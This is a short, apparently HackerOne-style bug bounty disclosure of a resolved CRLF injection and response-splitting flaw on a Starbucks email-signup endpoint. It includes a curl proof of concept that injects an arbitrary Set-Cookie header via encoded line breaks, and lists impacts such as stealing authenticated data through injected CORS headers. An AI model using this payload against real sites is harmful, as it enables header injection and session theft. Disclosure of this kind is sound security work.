CRLF injection on www.starbucks.com
Medium
S
Starbucks
Submitted None
Team Summary
Official summary from Starbucks
x3n0nn3p discovered the endpoint at www.starbucks.com/email-prospectt was affected by a CRLF injection / HTTP response splitting issue. @x3n0nn3p — thank you for reporting this vulnerability and for confirming the resolution.
Actions:
Reported by
x3n0nn3p
Vulnerability Details
Technical details and impact analysis
The vulnerability allows setting arbitrary headers, and also enables response splitting which can then be exploited further.
POC:
curl -i 'https://www.starbucks.com/email-prospecttg9wh%0d%0aset-cookie:foo%0d%0a%0d%0a4t6uf?requesturl=/responsibility/global-report/policies' -d 'newsletter_signup_email=&newsletter_signup_zipcode=&newsletter_placement=footer' --http1.1
Screenshot Attached.
Regards
## Impact
### Impact
Possible impacts include;
- Stealing authenticated information via Ajax request with injected CORS headers
- Application DOS using overly long Cookies, etc.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
CRLF Injection